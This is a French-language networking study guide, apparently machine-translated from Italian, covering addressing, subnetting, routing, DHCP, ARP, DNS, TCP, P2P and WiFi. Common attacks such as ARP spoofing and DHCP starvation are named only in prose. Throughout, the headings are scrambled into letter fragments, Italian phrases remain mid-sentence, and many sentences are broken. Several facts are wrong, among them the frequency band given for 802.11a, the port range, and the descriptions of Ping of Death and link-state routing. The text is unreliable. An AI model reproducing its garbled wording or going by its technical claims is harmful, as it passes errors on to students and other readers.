Guide Des Systèmes Et Réseaux 1
Guide Des Systèmes Et Réseaux 1
[Link]
SIM
. ONEZANELL
A
GUIDE
DE
SYST
R
È
ÉE
M
SE
T
A
EU
SX
PAR
AUTOS
TOPPSITI
É
T..U
.DA
INTS
INTRODUCTIONE ..............................................................................................4
L'HISTOIREA .............................................................................................................39
L'HISTOIREU n .............................................................................................................41
GLOSSARIO...........................................................................................................42
APPROFONDISSEMENTS : OUVERTSOURCE VS LOGICIEL LIBREO ........................43
APPROFONDISSEMENTS : CYBERGUERRE.........................................................45
L'HISTOIREA .............................................................................................................49
LICENCE ................................................................................................................71
VERSIONE .............................................................................................................71
GU
D
IE
D
T
ESIHÈME
E
SR
TÉSEAUX
POUR
AUTO
T
SOP
…
T
P
SIÉ
E
STUD
A
INTS
INTRODUCTION
Loin, dans les espaces oubliés non marqués sur les cartes géographiques de la limite extrême de la Spirale Ouest
de la Galaxie, il y a un petit et insignifiant soleil jaune. En orbite autour de celui-ci, à une distance de
cent quarante-neuf millions de kilomètres, il y a une petite planète bleu-vert, dont les
formes de vie, descendues des singes, sont si incroyablement primitives qu'elles croient encore que les
les montres numériques sont une excellente invention.
Si vous avez besoin de quelque chose pendant que vous étudiez les Systèmes et Réseaux, en particulier en vue
- notes synthétiques sur les principaux sujets de Systèmes et Réseaux (et un peu de
Télécommunications
- brèves définitions et descriptions des sujets et des termes informatiques à connaître;
- notes (très) rapides d'exercices de laboratoire;
- quelques notes sur des sujets approfondis durant le cours et non présents dans le livre de
testo
- matériaux d'exemple pour le lancement du Colloque Oral;
- notes sur des sujets de culture informatique abordés au cours des trois années (documentaires ,
film, ecc…) utiles pour l’entretien à l'Examen (par exemple pour se connecter avec « Citoyenneté et
Constitution
Cela ne remplace pas le livre, les notes et tout le reste du matériel fourni par les enseignants.
évidemment, mais cela peut être une aide précieuse lorsque le temps presse et que l'examen se
approchez-vous. En revanche, si vous êtes encore indécis sur ce que vous voulez faire de votre avenir après le Diplôme,
perchè siete in cerca della risposta alla “Domanda Fondamentale sulla Vita, l'Universo eTutto
Alors, vous devez consulter l'autre Guide, celui d'Adams, pour découvrir que la réponse
c'est simple, et c'est 42.
GUD
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTORS
IA
TO
IN
D
SE
ÉSTUDA
INTS
R
É
E
SA
U
L
XE
SQ
U
SU
C
R
E
H
LQ
O
U
E
SE
Topologiederéseau:latopologiephysiquedécritlastructurephysiquedesréseaux(niveaux1et2)
c'est-à-dire les dispositifs utilisés, leur emplacement, les types de canaux de transmission, les interfaces ; la topologie
la logique décrit les configurations des appareils, le routage IP, les classes d'adresses
utilisés, noms des hôtes.
Les topologies physiques classiques sont celles en étoile, en maillage (« mesh »), en anneau, en bus, à
arbre.
LAN, MAN, WAN, WLAN, PAN : termes qui divisionnent les réseaux (AN : Réseau d'aire) en
base à l'aire géographique servie : Local - Métropolitain - Étendu - Sans fil Local - Personnel.
SAN : Réseau de zone de stockage, réseau dédié au transfert de données entre serveurs et stockage.
typiquement basée sur la fibre et avec des transferts de données élevés jusqu'à 16Gbit/s.
Unité de données de protocole (PDU) : unité d'information ou paquet échangé entre deux couches dans un
protocole de communication d'une architecture de réseau en couches. Dans le TCP/IP, on l'appelle
datagramme.
Paquet : séquence de données transmises sur un réseau. Au niveau 2, on l'appelle trame, au niveau
IP/rete s'appelle datagramme (ou paquet IP), au niveau TCP s'appelle segment (mais
également un datagramme dans le cas de l'UDP).
Protocole : ensemble de règles qui supervisent la communication entre des entités du même
niveau. Définit les PDU (Unité de Données de Protocole) qui sont transférées pour communiquer
avec les messages de contrôle, formatés par un en-tête (qui contient des informations de
controllo) et un payload (qui contient les données).
Modèle ISO/OSI : c'est un modèle pour les architectures de protocoles (Système Ouvert
Interconnexion), divisé en 7 couches fonctionnelles qui communiquent en échangeant des PDU
(application, presentation, session, transport, network, data link, physical).
Le modèle définit une communication par niveaux : données deux nœuds A et B, le niveau n du nœud A
peut échanger des informations avec le niveau n du nœud B, mais pas avec les autres en utilisant un
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SOPP
T
…
S
IIE
ÉTUDA
INTS
Ethernet : c'est la norme 802.3 pour la réalisation des LAN, connue sous le nom de CSMA/CD.
Domaine de diffusion : ensemble d'hôtes dans un réseau qui peuvent communiquer au niveau.
Domaine de collision : ensemble d'hôtes qui accèdent au même moyen de transmission sur lequel
ils veulent transmettre des données.
CSMA/CD : protocole d'accès multiple pour la résolution des collisions sur les réseaux locaux
câblage de type diffusion. Un hôte ne peut utiliser le réseau Ethernet que si personne d'autre ne le fait.
il utilise déjà, grâce à un mécanisme d'écoute du moyen.
Dorsale ou Backbone : connexion à haute vitesse entre deux serveurs ou routeurs de commutation
les informations relient typiquement des tronçons de réseau avec une vitesse et une capacité inférieures grâce à
mécanismes de multiplication.
802.11 : norme IEEE pour la transmission sans fil dans les réseaux WLAN, également connu sous le nom de
WiFi.
Suite TCP/IP:definisce gli standard degli strati funzionali application, transport e internet
(réseau).
L'encapsulation : c'est la procédure par laquelle une donnée générée par un processus utilisateur traverse les
Classes d'adresses IPv4 : elles sont regroupées en fonction de la valeur des bits les plus significatifs en 5 classes.
Par principe, ils identifient l'extension d'un réseau en fonction de l'adresse IP à laquelle ils appartiennent. Pour trouver
la classe d'appartenance nécessite de convertir en binaire le premier octet, et de voir la valeur des
un peu plus significatifs.
• Classe D : commence par 1110, sous-réseau : non défini, blocs : de 224 à 239, utilisé pour le multicast
• Classe E : commence par 1111, sous-réseau : non défini, blocs : de 240 à 255, réservé pour des usages
futurs
Adresses IPv4 non valides : ce sont celles dont le NET-ID ou le HOST-ID est constitué de tous des bits à 0 ou à
Les réseaux privés : ils ne sont pas connectés directement à Internet, ils peuvent utiliser les suivants
Les adresses IPv6 : elles sont composées de 128 bits, répartis en 8 champs de 16 bits séparés par des deux-points.
Les groupes sont assignés par l'IEEE et identifient le fabricant, les autres le numéro de série du
dispositif (ex. [Link]) [1920]. L'adresse [Link] est utilisée
pour la diffusion. Certaines adresses sont réservées selon les spécifications dictées par l'organisme IANA.
IP vs MAC : le premier indique comment un hôte est connecté à un réseau, le second identifie l’hôte.
physique.
Hub : dispositif de niveau 1, connecte plusieurs appareils via un port réseau LAN, crée un
unico dominio di collisione, lavora in half-duplex, replica i bit trasmessi. Ha funzione di
amplification de signal, par conséquent, il est souvent utilisé sur des réseaux avec de très longs câbles.
Switch : dispositif de niveau 2, transmet les données sur le port auquel le destinataire est connecté, fonctionne
en duplex intégral, maintient une table avec l'association entre les adresses MAC et les ports,
Typiquement, il peut avoir jusqu'à un peu plus de 100 ports. Il est équipé de micrologiciel et est souvent
administrable (rendant ainsi plus efficace et en même temps plus vulnérable par rapport à
un hub). Cela permet de réduire considérablement les collisions, mais nécessite la connexion de
chaque nœud individuel au commutateur, ou les nœuds à hub connectés au commutateur. Crée un domaine
de collision séparé pour chaque port. Il ne peut pas interconnecter des réseaux utilisant
protocoles de communication différents (par exemple un réseau Token Ring et un Ethernet).
Différence entre un bridge et un switch : par rapport au bridge, le switch exécute toutes ses propres
élaborations via matériel et non logiciel, donc ne ralentit pas le flux de trafic entre les
segments de réseau.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
É
TUD
A
INTS
Routeur : dispositif de niveau 3, il dirige les données entre des réseaux physiques différents. Lorsqu'il reçoit un
le paquet résout l'adresse logique en adresse physique et crée une trame directe vers le routeur suivant
(prochain saut), en cas de routage dynamique, communique avec les autres routeurs du réseau. Dans
cas dans lequel un routeur avec un routage statique doit envoyer des données à un réseau auquel il n'est pas
Uplink : c'est un port utilisé pour transmettre des données d'un hôte à un commutateur, un routeur, un hub
ou une dorsale, ou pour relier entre eux des hubs via des câbles croisés.
Segment de réseau : portion de réseau séparée des autres par un dispositif de réseau (hub,
commutateur, pont)
Point d'accès (AP) : permet d'accéder à un réseau en mode sans fil, généralement
par onde radio. Il peut être connecté à d'autres AP pour étendre un réseau sans fil,
permettant aux dispositifs qui l'utilisent de rester connectés même en se déplaçant
changement AP ou canal (transfert).
Câblage Structuré : standard utilisé dans les bâtiments destinés aux bureaux pour la réalisation
des installations de réseau, généralement basées sur des câbles de catégorie 5 ou supérieure et des connecteurs
RJ-45, avec possibilité d'utilisation de la fibre optique pour les liaisons de raccordement. Les câbles ont une
longueur maximale de 100 mètres. Pour chaque point à desservir, un ou plusieurs sont posés.
cavi dans des canalisations appropriées dans les murs, les faux plafonds ou les sols du bâtiment,
jusqu'à atteindre un armoire de distribution de étage (Distributeur de Sol, FD, c'est-à-dire
câblage horizontal) également connu sous le nom de comerack. Les FD sont connectés à un armoire de
bâtiment (Distributeur de bâtiment, BD), via des câbles en cuivre ou en fibre optique (câblage
verticale). De la même manière, les différents bâtiments d'un soi-disant "campus" sont reliés à un
Campus Distributor, CD. Les locaux qui accueillent les armoires de distribution devraient
avoir des caractéristiques adéquates pour l'alimentation électrique (de préférence protégée par un groupe
di continuité - UPS), climatisation, contrôle d'accès du personnel. On distingue entre
câblage vertical (câblage de bâtiment) et horizontal (de étage).
GUD
IE
DESYSTÈMED
SE
THÈMEE
ST
DE
RÉSEAUX
POUR
LEÉ
STUDA
INTS
FAI : Fournisseur d'accès Internet, entreprise ou société qui fournit des services liés à Internet.
Nœud : chaque élément matériel d'un réseau capable de communiquer. Cela peut être un élément
de tri du trafic (par exemple un hub) ou un élément terminal comme un client ou
un serveur.
Hôte : nœud terminal du réseau. Cela signifie “invité”, cela peut être un client ou un serveur.
GU
D
IE
DE
SUJET
E
SIT
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS
P
R
Q
OU
L
TE
O
C
S
L
U
E
C
Q
HT
R
O
UL
E
SE
S
SERVC
IED
SE
RÉSEAU
Client/Serveur : c'est un modèle composé de processus s'exécutant sur des hôtes différents. Les processus
qui gèrent et mettent à disposition des ressources sont appelés serveurs tandis que ceux qui en
Ceux qui demandent l'accès sont appelés clients.
Architecture distribuée : c'est un système dans lequel le traitement des informations est distribué
sur plusieurs ordinateurs, dont les composants coopèrent en communiquant en réseau et en se coordonnant
propre actions via l'échange de messages. Elles se caractérisent par une grande scalabilité
(possibilité d'ajouter des ressources pour améliorer les performances et mieux supporter les charges de)
travail) et de tolérance aux pannes grâce à la possibilité de répliquer les ressources. Le développement de
les systèmes logiciels distribués se font par l'utilisation de middleware, une couche logicielle
qui se situe entre le système d'exploitation et les programmes applicatifs.
DHCP : c'est un protocole qui permet aux hôtes de recevoir une configuration IP complète
pour accéder à un réseau auquel ils sont connectés. Le service est fourni par un serveur dédié (ou
d'un routeur qui offre ce service). Typiquement, il fonctionne en trois modes :
• statique : l'administrateur réseau configure sur le serveur les associations entre l'adresse IP et le MAC
Adresse;
• automatique : l'administrateur définit une plage d'adresses attribuables par le serveur, et l'IP
est ensuite associé à l'hôte sans date d'expiration fixée;
• dynamique : l'administrateur définit une plage d'adresses attribuables par le serveur, et l'IP
il est ensuite associé à l'hôte pour une durée déterminée pour l'expiration (temps de location).
• DHCP ACK (est envoyé par le serveur à l'hôte confirmant les paramètres de configuration
offerts, après avoir effectué un ping sur le réseau pour vérifier qu'aucun autre hôte ne s
vous êtes connecté avec la même adresse IP entre-temps).
Le renouvellement de l'adresse IP en cas de lesse time est effectué par l'hôte avec un nouveau DHCP
Le DHCP présente certaines vulnérabilités : la Starvation d'adresse, qui consiste
en envoyant de fausses requêtes DHCP pour saturer les plages d'adresses IP disponibles,
empêchant de nouveaux hôtes légitimes de se connecter au réseau, et la technique du Rogue Server, avec la
comment insérer un faux serveur DHCP auquel connecter les machines du réseau
détournant le trafic.
ARP : c'est le protocole qui s'occupe de gérer les correspondances entre les adresses IP et les adresses Mac
dans un réseau. Chaque hôte encapsule les paquets envoyés dans des trames dans lesquelles il doit insérer l'adresse.
Adresse Mac du destinataire, qui est dérivée de tableaux appropriés contenant les associations
IP-Mac detteARPTable. Typiquement, la table ARP est mise à jour de trois manières : en surveillant
le trafic réseau en déduisant les associations à partir des trames en transit ; en émettant un ARP
DEMANDE en broadcast qui demande quel hôte a une adresse IP déterminée, recevant une
réponse ARP REPLY et mise à jour de la table, avec une durée typique de l'enregistrement de 120
secondi dans les commutateurs ; ou en mémorisant manuellement des paires IP-MAC sans expiration
(option rare). Le protocole a deux problématiques :
• puisque les demandes ARP sont effectuées en broadcast, des situations peuvent se produire
d'un trafic intense lorsque de nombreux appareils accèdent simultanément au réseau;
• est vulnérable aux attaques de type ARP Spoofing (ou ARP Poisoning) dans lesquelles un hôte introduit
réponse ARP fausse sur le réseau pour modifier correctement les tables ARP, permettant un
situation de MITM (Man In The Middle) interceptant le trafic entre les hôtes. L'hôte A
communique avec B, mais en réalité l'hôte C attaquant se trouve au milieu et ce que réellement
A communique avec C, qui retransmet à B.
NAT : la traduction d'adresse réseau est un service qui permet de transformer une adresse
IP de la LAN en une adresse IP publique en modifiant l'en-tête IP des paquets de données. Cela est
utilisé généralement à l'intérieur d'un réseau privé, où l'appareil chargé de
NAT (en général un routeur) associe aux ordinateurs qui en font la demande une adresse publique
GU
D
IE
DE
SU
S
IJET
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS
sont introduites dans les réseaux de fausses associations NAT, qui redirigent le trafic de la
reste selon les désirs de l'attaquant.
ICMP : Internet Control Message Protocol est un protocole de contrôle utilisé par les nœuds pour
lo scambio di messaggi di errore e informazioni sullo stato della rete. Il più noto è il
commandePINGqui sert à envoyer des paquets de type ECHO REQUEST et à recevoir des
ECHO REPLY pour déterminer si un hôte est actif, en calculant également le temps de réponse. Le
le protocole peut s'avérer vulnérable aux attaques de type Ping of Death, où un excès de
La DEMANDE ECHO entraîne une surcharge du réseau et, dans certains cas, le plantage des hôtes.
DNS : Système de noms de domaine, sert à traduire les noms de [Link]) dans les adresses
IP. Le DNS est organisé en arbre, le point d'origine est indiqué par un point « . » et est
dettoroot, ci-dessous sont indiqués les noms des branches de l'arbre et chaque "." représente une
diramazione.
Exemple :[Link]
• www est le 3ème niveau, peut être choisi par le propriétaire et sert généralement à identifier un
servizio offerto ([Link] per il sito web,[Link] le serveur de messagerie
sortie, etc...)
URI : Identifiant de ressource uniforme, identifie une ressource de manière unique sur Internet.
la première partie indique le protocole à utiliser. Exemple [Link]
URL : Localisateur Uniforme de Ressource est une spécification d'un URI par lequel on indique la
localisation précise d'une ressource sur internet. Exemple [Link]
FTP : Protocole de Transfert de Fichiers, protocole pour le transfert de fichiers. Il est basé sur TCP et a un
architecture client/serveur. Utilise le port 21 pour établir une connexion de contrôle, dans
GUD
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOPP
…
T
S
IEÉTUDA
INTS
POP3 : le Protocole de Bureau de Poste est un protocole pour la consultation des courriers électroniques.
utilisé pour recevoir des e-mails d'un serveur distant dans un client local pour les lire hors ligne (à
exemple Outlook, Mac Mail, Mozilla Thunderbird). Utilise le port 110 (995 en mode
sûre via SSL/TLS, elle ne fournit pas de cryptage par défaut.
IMAP : le protocole d'accès aux messages Internet est un protocole pour la consultation des courriels
électronique, utilisé pour un accès direct à une boîte mail sur un serveur distant d'un
locale client (par exemple le navigateur), sans demander le téléchargement des messages. La
le courrier est consulté directement sur le serveur. Il utilise le port 143 (993 en mode sécurisé)
via SSL/TLS, ne fournit pas de chiffrement par défaut).
SMTP : Protocole de transfert de courrier simple est le protocole pour l'envoi de courriers électroniques.
Utilisez le port 25 (465 en mode sécurisé via SSL/TLS, de base il ne fournit pas de cryptage).
TLSedSSL : La sécurité des transports et les couches de sockets sécurisées sont des protocoles cryptographiques pour
crypter et authentifier une connexion lors du transfert de données sur Internet, via
l'utilisation de certificats. TLS est une version récente de SSL.
GU
D
ID
EE
SY
SSTÈMES
R
TÉSEAUX
POUR
LE
A
SUTO
T
S
O…
P
TP
S
IÉ
ETUD
A
INTS
R
O
S
É
E
A
U
-SX
,L
E
SUSRC
H
Q
O
UE
S
L
Q
UE
ROUTÉ
N
IV
EL
IAN
Sous-réseautage : technique qui permet de diviser un réseau en sous-réseaux grâce à l'utilisation d'une
masque de sous-réseau.
Masque de sous-réseau : est constitué de 4 octets de bits (comme une adresse IP), le masque de sous-réseau est
composée de bits à 1 pour le Net-ID et pour la sous-réseau d'appartenance, et à 0 pour la partie Hôte-
ID, e viarp -ene messa en AND bit à bit avec l'adresse IP du destinataire d'un paquet,
permettant d'extraire la sous-réseau d'appartenance. Pour la détermination du sous-réseau
des masques utilisent les bits les plus significatifs de l'Host-ID de l'adresse IP.
- Exemple : adresse réseau [Link]. Étant de classe C, 8 bits peuvent être utilisés pour l'ID de l'hôte (256
hôte). En choisissant le 1er bit de l'ID hôte pour le masque de sous-réseau, on obtient (en binaire) :
11111111. 11111111. 11111111.10000000 c'est-à-dire [Link]
en utilisant 1 bit pour le sous-réseau, on peut réaliser 2^1=2 sous-réseaux, chacun de 2^7=128 hôtes (-2
hôtes chacun retirés les adresses réseau et de diffusion).
- Exemple : adresse réseau [Link]. Étant de classe B, 16 bits peuvent être utilisés pour l'Host-ID.
(65.536 hôtes). En choisissant les 4 premiers bits de l'Host-ID pour le masque de sous-réseau, on obtient (en binaire) :
VLSM : technique qui permet d'utiliser des sous-réseaux de longueurs différentes au sein du même
adresse réseau.
- Exemple : adresse réseau [Link]. Je peux utiliser un masque de 1 bit pour diviser le réseau en 2
sous-réseaux de 128 hôtes, et utiliser 2 bits dans la plage d'adresses pour le deuxième sous-réseau pour diviser le
segmenter en 2 sous-réseaux supplémentaires de 64 hôtes :
[Link] / [Link]
hôte sous-réseau n°1 : de [Link] à [Link]
[Link] / [Link]
GU
D
IE
D
T
ESIHÈME
E
SR
TÉSEAUX
POUR
AUTO
E
É
T
S
.T
O
U
.P
.D
T
P
S
A
INTS
Sans classe : indique le routage sans classes d'appartenance IP (et permet donc de
choisir librement les masques de sous-réseau et les adresses).
Le routage : c'est l'opération d'acheminement des messages effectuée par les routeurs. Il comprend 2 phases :
- calcul (routage) du chemin optimal, basé sur les informations présentes dans les tableaux de
routage
- Le transfert (forwarding) du paquet vers l’interface de sortie du routeur choisie. Dès que
Après avoir acquis l'adresse IP du paquet, le routeur vérifie sa propre netmask et détermine si
il est relatif à un hôte de son propre réseau, dans ce cas, il utilisera les services du niveau 2 pour
transférer le paquet directement à l'hôte destinataire (routage direct); sinon, si c'est
destiné à un autre réseau consulte sa propreRoutingTable, s'il est connecté au réseau
transférez directement le paquet, sinon il l'enverra au routeur indiqué par le tableau ou à
celui par défaut, qui répétera le processus (routage indirect).
- dans le cas où le routage est direct, un astérisque est inséré comme Prochain Saut, tandis que
dans le cas de réseaux inconnus, on indique par défaut le réseau de destination et par /0 le sous-réseau
masque.
- Les tableaux sont lus « de haut en bas », il est donc important de faire
attention aux masques de sous-réseau et à la position de la passerelle par défaut (dernière position).
- généralement, les interfaces réseau d'un routeur (s'il a 4 ports) sont indiquées par des points
cardinaux N,S,O,E (en anglais N,S,W,E).
R1 [Link] /26 * S
R1 [Link] /25 * N
R2 [Link] /24 * O
R2 [Link] /16 * S
Coût : représente la somme des coûts des lignes traversées, il est inversement proportionnel
à sa vitesse, qui est liée à la bande passante, au type et à la fiabilité du moyen de transmission,
longueur du parcours, trafic de réseau.
Routage statique : les chemins pour le routage des paquets sont déterminés par l'administrateur
de réseau, qui configure manuellement les tables de routage. C'est simple à réaliser sur des réseaux de
petites dimensions et avec une faible redondance de connexions, à mesure que la taille augmente
du réseau devient difficile à gérer. De par sa nature, elle présente une faible tolérance aux pannes, et à
Chaque variation de la topologie du réseau impose la reconfiguration des tables dans les nœuds.
GUD
IE
ST
S
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SOPPT
S
I…
IE
ÉTUDA
INTS
Routage hiérarchique : il est utilisé à grande échelle sur le réseau Internet et prévoit justement la
réalisation d'une hiérarchie de zones de routage structurées en régions appelées Autonomes
Système (AS), qui peuvent être subdivisées en portions appelées zone de routage
(RA) interconnectés par des dorsales (backbone). Les différentes entités de gestion s'accordent sur lesquels
protocoles à utiliser pour le dialogue entre les routeurs qui interconnectent des AS différents. Les protocoles de
Le routage à l'intérieur d'un AS est appelé Protocole de Passerelle Interne (IGP), tandis que ceux entre les
Les protocoles de passerelle extérieure (EGP) sont dits vari AS. Chaque routeur maintient les informations
pour toutes les destinations à l'intérieur de l'AS où elle se trouve, tandis que pour toutes les autres
les destinations envoient les paquets à un routeur à la périphérie de l'AS qui s'en occupe
de l'acheminement vers d'autres AS. Sert à maintenir les tables de routage réduites dans les réseaux de
dimensions élevées.
Routage par état de lien ; protocole utilisé dans le routage statique qui se base sur l'état des
liens entre les nœuds. Des paquets LSP (Link) sont envoyés en inondation à chaque routeur.
Paquets d'état contenant l'état de chaque lien, l'identité de chaque voisin et les coûts des liens
connectés au nœud qui l'envoie. Utilise l'algorithme de Dijkstra (Shortest Path First) pour le
calcul du chemin le plus court. Tous les nœuds conservent une copie entière de la carte de la
rete et exécutent un calcul complet avec l'algorithme de Dijkstra des meilleurs parcours,
par conséquent, le calcul n'est pas distribué.
DistanceVector Routing : protocole utilisé dans le routage dynamique où un message est envoyé.
table de routage d'un routeur à tous les routeurs voisins sous forme de vecteur, avec indiqués les
coûts de connexion.
Exemple : le vecteur du routeur A [A-0, B-2, C-4, D-2] indique que le routeur A a un routage direct (local, coût
zéro), envoyer au routeur B coûte 2, et ainsi de suite.
C'est un algorithme itératif, distribué et asynchrone (il ne nécessite pas que les nœuds opèrent en
contemporané). Utilise l'algorithme de Bellman-Ford pour le calcul du chemin le plus court
brève. Bellman-Ford a le problème de ne pas détecter les boucles (cycles) infinies, pour lesquelles il
ils utilisent l'empoisonnement de route (essaient de bloquer en mettant le coût à l'infini les routes vers lesquelles)
le coût augmente progressivement) et/ou le split horizon (je ne communique pas à un nœud voisin
parcours qui s'apprennent à partir de ce nœud).
GU
D
IE
D
T
ESIHÈME
E
SR
TÉSEAUX
POUR
AUTO
E
É
T
S
.T
O
U
.P
.D
T
P
S
A
INTS
diffusion toutes les 30 secondes, et si la route n'est pas mise à jour dans les 3 minutes, elle est mise à
distance 16 et ensuite retirée.
IGRP : protocole de routage de type Distance Vector propriétaire de CISCO. Il a un compte de saut
di 255 et permet de avoir plus d'entrées dans les tableaux pour la même destination.
Un trou noir : c'est un point du réseau où les paquets sont rejetés parce qu'ils ne peuvent pas être trouvés.
une destination.
Comptez jusqu'à l'infini : cela se vérifie lorsque le coût pour atteindre une destination ne plus
accessible est progressivement augmenté à l'infini.
VLAN : c'est une technique qui permet de mettre en place plusieurs réseaux locaux divisés au niveau logique mais
qui partagent la même infrastructure physique. Elles sont gérées via des commutateurs appropriés.
administrables, permettant de préparer différents segments de réseau dans lesquels les
des systèmes et dispositifs individuels peuvent communiquer entre eux sans avoir besoin d'un routeur,
garantissant une grande évolutivité du réseau. Avec les VLAN, on réalise des domaines de diffusion
séparément, garantissant les performances du réseau. Avec l'utilisation du protocole 802.1Q, il est possible
étendre les VLAN sur d'autres réseaux physiques en connectant les commutateurs via des ports appropriés
dette de «tronc». Il en existe deux types :
- port VLAN : les ports du switch sont attribués aux VLAN, l'association est faite
directement par connexion entre l'appareil et le switch (attribution statique);
- VLAN taguée : un tag est ajouté dans le cadre ethernet (32 bits de long) après
l'adresse MAC, qui identifie le VLAN d'appartenance via un VID (identifiant de VLAN), qui
consente de gérer jusqu'à 4096 VLAN différentes. Les trames appartenant à des VLAN différentes sont
instradés à travers des ports trunk. Le port trunk peut également servir à connecter le commutateur
un serveur qui fournit des services à plusieurs VLAN, dans ces cas pour réaliser l'inter-VLAN
Le routage si utilise un switch L3, qui est une sorte de routeur qui opère sur le réseau local.
Routage Inter-VLAN : pour permettre la communication entre différentes VLAN, un appareil est nécessaire.
routage. Chaque VLAN doit avoir une passerelle qui permet le routage, c'est-à-dire que le routeur doit
posséder une interface pour chaque VLAN à mettre en communication. Il est possible d'utiliser
GU
D
IE
DE
T
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
T
SOP…
T
P
SIE
ÉTUD
A
INTS
QU
U
EL
D
E
C
Q
PT
H
U
S
C
UO
E
P
RSE
TCP : c'est un protocole de la couche de transport de la suite TCP/IP orienté vers la connexion, la
la transmission des données se fait de manière bidirectionnelle uniquement après qu'elle a été établie
connexion entre les appareils. Inclure un système de contrôle de la livraison des colis.
Il a une architecture de type client/serveur.
Handshake en 3 voies : c'est la procédure par laquelle la connexion TCP se fait entre deux hôtes.
3messagesareexchanged,inwhichcertainfieldsandflagsareset:
• l'hôte A envoie un segment SYN à l'hôte B (le drapeau SYN est défini sur 1 et le champ
Le numéro de séquence (seq) contient la valeur x qui spécifie le numéro de séquence initial (ISN)
di A);
A -> B SYN, seq=x
• B envoie en réponse un segment SYN/ACK à A (les drapeaux SYN et ACK sont réglés à 1, le
le champ seq contient la valeur y qui spécifie l'ISN de B et le champ numéro d'accusé de réception
(ack) contient la valeur x+1 confirmant la réception de l'ISN de A;
B -> A SYN/ACK, ack=x+1, seq=y
• A envoie en réponse un segment ACK à B (le drapeau ACK est réglé sur 1 et le champ ack
contient la valeur y+1 confirmant la réception de l'ISN de B).
A -> B ACC, acc=y+1, seq=x+1
Le troisième segment sert à l'hôte B pour estimer le timeout initial comme le temps écoulé entre
l'envoi d'un segment et la réception de l'ACK correspondant. Le drapeau SYN trouve une particulière
utilisation dans les pare-feu car les segments avec le drapeau non actif appartiennent à des connexions déjà
stabilité.
Le scan SYN : c'est un scan réseau effectué pour détecter les ports ouverts sur un hôte.
la présence d'un pare-feu, l'ACK (dernier étape du handshake en 3 étapes) n'est pas envoyé pour
rendre plus difficile la détection de la numérisation en cours.
Multiplexage : le TCP permet de faire transiter sur une même ligne des données provenant de
GUD
IA
D
SIS
TEM
EIRET
PIER
AUTOS
TOPPS
IT
…
IES
TUDENTI
Porte: utilizzate nelle socket, sono composte da 16 bit, e quindi variano tra i valori 0 e
65536. LoIANA (Autorité des numéros attribués sur Internet) est l'organisme qui gère
l'attribution standard des ports aux différents services de réseau et applications :
• De 0 à 1023, ce sont des ports bien connus, et ils sont attribués aux services les plus courants (DNS
port 53, SMTP port 25, FTP port 21, HTTP port 80, etc…);
• De 1024 à 49151, on les appelle Ports enregistrés, et ils sont généralement enregistrés par des entreprises.
auprès de l'IANA pour ses propres applications;
• les ports restants jusqu'à 65536 sont appelés Ports Dynamiques, et sont utilisés au besoin pour
les connexions.
P
2Q
LU
E
E
C
S
U
LH
Q
R
OU
E
S
P2P : pair à pair, est un modèle de réseau informatique dans lequel les nœuds sont « paritaires » (pairs)
au lieu d'être hiérarchisés comme client ou serveur. Chaque nœud peut avoir les deux fonctions
vers les hôtes du réseau. Ils se classent en trois catégories principales :
• Puro : il n'est pas doté de serveur central de support, chaque nœud s'occupe d'individualiser les
ressources réseau disponibles et les autres pairs. Est généralement intégrée avec une Virtuelle
Réseau superposé (overlay), où les nœuds forment un sous-réseau par rapport au réseau physique
principal, afin de pouvoir indexer et cartographier les nœuds en définissant la topologie du réseau.
• Serveur de découverte : s'appuie sur un serveur central (Discovery) auquel chaque pair communique
propre existence au moment du démarrage et reçoit une liste avec les autres noms du réseau. Le
le pair primaire contacte le serveur individuellement puis transmet la demande.
• Discovery + Serveur de recherche : comme pour le P2P avec le serveur de découverte, mais chaque pair envoie
une liste de ses contenus au serveur à intervalles réguliers. À chaque demande, le serveur
fournit une liste des participants au réseau ainsi que leurs contenus, réduisant
richieste senza esito e ottimizzando i tempi.
P2P structurée : elle a une topologie spécifique, qui assure que chaque nœud puisse
chercher et trouver une ressource ou un nœud de manière efficace. Intègre une table de hachage distribuée,
à l'intérieur de laquelle chaque ressource correspond à un code identifiant unique.
P2P non structuré : les nœuds créent des connexions aléatoires avec d'autres nœuds du réseau.
Sécurité : les principaux programmes de connexion aux réseaux P2P prévoient que l'utilisateur
met à disposition, en plus de la bande de connexion, également de l'espace sur son propre disque pour
le partage de fichiers, en ouvrant également certaines portes de son système pour le partage de fichiers.
Légalité : selon la législation italienne, quiconque télécharge une œuvre protégée par
le droit d'auteur et le partage est un délit pénal s'il le fait « sans en avoir »
droit, à toute fin et sous toute forme.
BitTorrent : c'est l'un des protocoles pour les réseaux de partage de fichiers p2p les plus répandus, utilise un algorithme
GUD
IE
DE
S
T
IHÈMEE
ST
RÉSEAUX
POUR
AUTO
TOPP
T
…
S
IIE
ÉTUDA
INTS
W
Q
F
IU
L
E
C
LS
U
Q
H
RU
O
ES
WiFi : technologie pour les réseaux sans fil basée sur la norme 802.11. Les points d'accès ont en
génère un portée de 20 mètres à l'intérieur et environ 100 mètres à l'extérieur. La partie radio
constitue le réseau d'accès, le réseau câblé qui interconnecte les AP constitue le réseau de
transport. Il est typiquement opportun de ne pas faire gérer plus de 30 clients au même AP (cela dépend
de toute façon du matériel et de la bande).
Canaux : le Wi-Fi utilise différentes bandes de fréquence pour la transmission. Il est possible d'utiliser
une bande à 2,4 GHz (norme 802.11a, 802.11b et 802.11g) ou à 5 GHz (norme 802.11n et
802.11ac), divisée en canaux avec différentes sous-fréquences.
La bande de 2,4 GHz dispose de 14 canaux. Les canaux se chevauchent les uns avec les autres (environ avec
une plage de 4 canaux, donc le canal 5 se superposera avec les canaux 1, 2, 3, 4 et 6, 7, 8, 9)
sauf les canaux 1, 6 et 11, qui sont des canaux non superposables. La bande passante est de
20 MHz, et la vitesse maximale est de 144,5 Mbps. Il est possible d'utiliser une largeur de bande.
un 40MHz atteignant 300Mbps de vitesse, mais il est déconseillé car non conforme aux
directives IEEE et potentiellement source de perturbations et d'interférences pour les réseaux limitrophes.
